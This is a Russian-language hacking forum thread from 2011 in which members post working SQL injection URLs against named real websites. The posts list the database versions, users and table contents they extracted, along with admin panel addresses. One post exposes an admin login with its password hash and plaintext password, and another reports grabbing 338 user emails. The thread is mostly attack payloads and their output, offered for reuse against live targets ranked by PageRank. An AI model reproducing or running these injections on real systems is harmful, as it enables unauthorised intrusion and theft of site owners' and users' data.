HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13741  
Старый 18.03.2011, 11:19
Unknown
Guest
Сообщений: n/a
Провел на форуме:
1477

Репутация: 4
По умолчанию

http://www.leoalexander.co.uk/index.asp?id=11+and+1=0+union+all+select+1,2,3,con cat_ws%280x3a,version%28%29,database%28%29,user%28 %29%29,5,6,7+--+

Результаты в тайтле страницы.

Удалось подобрать таблицу users (id, email, country). Парольного поля подобрать не получилось. В таблице данные 338 пользователей.
 
Ответить с цитированием

  #13742  
Старый 18.03.2011, 13:07
asql
Guest
Сообщений: n/a
Провел на форуме:
8829

Репутация: -3
По умолчанию

Вот прикольная инъекция

http://kapitoshka.lg.ua/gallery.php?page=2&section=99999+union+select+vers ion()--

догадайтесь где версия!)
 
Ответить с цитированием

  #13743  
Старый 18.03.2011, 14:44
bloodAngel
Новичок
Регистрация: 29.06.2007
Сообщений: 18
Провел на форуме:
642141

Репутация: 17
Отправить сообщение для bloodAngel с помощью ICQ
По умолчанию

Цитата:
Сообщение от asql  
asql said:
Вот прикольная инъекция
http://kapitoshka.lg.ua/gallery.php?page=2&section=99999+union+select+vers ion()--
догадайтесь где версия!)
" href="pictures/gallery/5.0.51a-24+lenny5-log.jpg">"

Код:
Code:
http://www.globalalliancepr.org/event.php?id=-8+union+select+concat%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29
4.1.22:global_geral:global_geraladm@localhost
 
Ответить с цитированием

  #13744  
Старый 18.03.2011, 15:03
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765

Репутация: 257
Отправить сообщение для A_n_d_r_e_i с помощью ICQ
По умолчанию

http://www.santaspen.net/content.php?id=-9+union+select+1,2,group_concat(0x3a3a,id_usr,emai l_usr,0x3a3a,password_usr),4,5+from+users_usr+--

Админка: http://www.santaspen.net/admin/index.php

Google PageRank (PR): 3

-----

http://www.flatsminsk.com/info.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,@@version,1 3+--

Админка: http://www.flatsminsk.com/admin/index.php

Тиц: 30

-----

http://rakurs.rovno.ua/info.php?id=-182+union+select+1,2,3,4,5,6,@@version,8,9,10,11,1 2,13,14+--

Тиц: 20

Google PageRank (PR): 2

-----

http://www.harrisinstitute.com/site/page.php?id=103+union+select+1,2,group_concat(user name,password,0x3a3a),4,5,6,7,8,9,10+from+tbl_user s+--

Админка: http://www.harrisinstitute.com/admin

Google PageRank (PR): 4

Admin:b75054364c277adfdca606e3300413a8:purples0177
 
Ответить с цитированием

  #13745  
Старый 19.03.2011, 13:04
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

http://teachers.yale.edu/curriculum/search/viewer.php?id=-initiative_09.01.01_u'+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),6,7,8,9,10,11,12+--+

5.0.77-log:res_teachers1:res_teachers@192.168.101.195:red hat-linux-gnu

Google PageRank (PR): 6
 
Ответить с цитированием

  #13746  
Старый 19.03.2011, 15:09
good.god
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
Провел на форуме:
1298413

Репутация: 44
Отправить сообщение для good.god с помощью ICQ
По умолчанию

Код:
Code:
http://www.superav.com/fr/details_final.php?productID=-1+union+select+1,2,group_concat(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
5.0.91-community:superav_MyMovie@localhost:superav_movie

вывод в титле.
 
Ответить с цитированием

  #13747  
Старый 20.03.2011, 13:46
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

http://www.nypdangels.com/cop/cop.php?id=-159+and+(select*from(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+concat_ws(0x3a,user(),@@version_compile_ os)+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64 ),floor(rand(0)*2)))z)+--+

5.0.91-log:nypdange_angels:nypdange_deespc@boscgi0102.eig box.net:unknown-linux-gnu
 
Ответить с цитированием

  #13748  
Старый 20.03.2011, 16:24
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

http://www.melges.com/?p=news&id=-1074+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os)+--+

5.0.77-log:409707_melges:409707_melges@172.17.3.93:redhat-linux-gnu

ТИЦ: 10

Google PageRank (PR): 4
 
Ответить с цитированием

  #13749  
Старый 20.03.2011, 17:51
DJ4J
Познающий
Регистрация: 23.08.2009
Сообщений: 93
Провел на форуме:
1639209

Репутация: 71
Отправить сообщение для DJ4J с помощью ICQ
По умолчанию

Моя первая инъекция

Код:
Code:
http://www.magadangorod.ru/index.php?do=form&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat%28version%28%29%29,10%20--
5.0.92-community-log

ТИЦ 210

PR 5
 
Ответить с цитированием

  #13750  
Старый 20.03.2011, 21:08
DJ4J
Познающий
Регистрация: 23.08.2009
Сообщений: 93
Провел на форуме:
1639209

Репутация: 71
Отправить сообщение для DJ4J с помощью ICQ
По умолчанию

Код:
Code:
http://www.korkinskoe.ru/index.php?page_id=-1+union+se lect+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,concat(username,0x3a,password),19,20,21,22+from+korkino_users
Вывод в тайтле.

5 ветка.

Админка:

http://www.korkinskoe.ru/admin/

тиц 10
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ